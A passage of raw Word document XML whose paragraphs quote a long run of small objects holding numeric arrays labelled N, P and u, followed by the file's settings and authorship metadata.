    <w:p w14:paraId="37E68B27" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227527F1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038A1B0D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643C74AC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [12, 34, 44, 94, 109, 257, 323]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E54D81A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F353AF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDE2C53" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22575E7F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [313]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD0E8CF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4580094B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF14FA5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53895F22" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [6, 55, 95, 118, 185, 201, 271]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58136E4C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7B365E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [9, 14, 7, 0, 21, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE1AF68" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 19, 20, 21, 23, 24, 25],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7612FAFA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [18, 22, 32, 65, 124, 131, 133, 159, 167, 203, 207, 225, 240, 241, 256, 262, 275, 296, 314, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51332CA0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3343CDDE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3D8C06" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13319BDF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71357DBF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C25EA05" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458F8F5E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7BE2EA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBCF5B6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722B24A0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C290256" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4B92F4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A518245" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FF4C8E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2428EC55" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FF3F63" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 18, 20, 109, 173]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2F8FE1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAF9F8E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E88C4F4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF8B196" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 37, 147, 255]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C1A561" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F24492" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3D4FB4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 5, 6, 7, 8, 9, 10, 11, 12, 14, 15, 16],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1127B536" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 4, 13, 18, 159, 245, 311, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5FA62B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F769962" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E735AB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3802BEA2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 347]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C581AB3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B053AAA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A86C57" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2251249E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [9, 14]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF6812A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C5F1D7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DB86D2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CFE53A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4, 26]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A99D217" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1D8509" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69858B73" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4343AB2B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 117]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160A7C25" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B496405" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398EDFB8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39296FC2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B13E1F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA8DA2A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C67239" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3318BD04" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 4, 19, 26, 51, 169, 251]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571800CB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE34A61" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [24, 18, 33, 20, 13, 7, 32, 34, 14, 16, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A954E4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16, 17, 18, 20, 21, 22, 23, 24, 25, 27, 28, 29, 30, 32, 33, 34],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2A66A5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 4, 10, 19, 26, 31, 40, 51, 58, 59, 64, 70, 75, 86, 87, 90, 93, 100, 102, 106, 112, 113, 129, 130, 140, 141, 146, 147, 153, 161, 164, 169, 187, 189, 192, 200, 202, 206, 208, 211, 229, 231, 242, 247, 249, 251, 253, 255, 266, 267, 270, 273, 274, 275, 279, 282, 286, 290, 308, 309, 313, 326, 327, 344, 349, 352, 356]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B0D483" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED55B51" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1CEEF8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530870F1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3, 349]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E1A705" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD119A6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [12, 6, 3, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD1BCF0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554A0F8A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [275]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1542FE7F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462A0E0D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5669E03D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 7, 8, 9, 14, 15, 17, 18, 19, 21, 22, 23, 26, 27, 28, 29, 30, 31, 33, 34],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CC63FF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 3, 4, 5, 6, 10, 11, 12, 13, 16, 20, 24, 25, 32, 65, 133, 159, 203, 207, 225, 240, 241, 256, 275, 296, 314]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A24ED53" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B17220" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137421D3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69425A37" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [29, 110, 217]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318BE385" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA4429A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9BED41" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 3, 4, 5, 6, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE9B241" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 2, 159, 311, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066820B6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BBA953" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315BD2BC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         g: 7,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB03A42" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B7C626" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36398748" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5807A913" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EE2887" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239588BA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 6, 7, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAB1E90" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 5, 8, 92, 111, 196, 208, 290, 309, 328, 349]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C04FBB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BF9578" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D602F3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3BDC67" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [147]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445565DC" w14:textId="798310C4" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002321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109"/>
    <w:rsid w:val="00232109"/>
    <w:rsid w:val="008E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4F016"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FEA8B583-5BD2-46CB-AD82-A9052472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1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21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21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21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21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21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21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21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21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21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21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21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21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21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21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21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21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21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21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21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21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21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21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21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21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21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21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21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210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2D3236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DEDA4-1DE7-4776-B619-4286701B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40</Pages>
  <Words>113527</Words>
  <Characters>647109</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>5392</Lines>
  <Paragraphs>15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myne marrujo</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>jazmyne marrujo</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-14T17:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-14T18:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>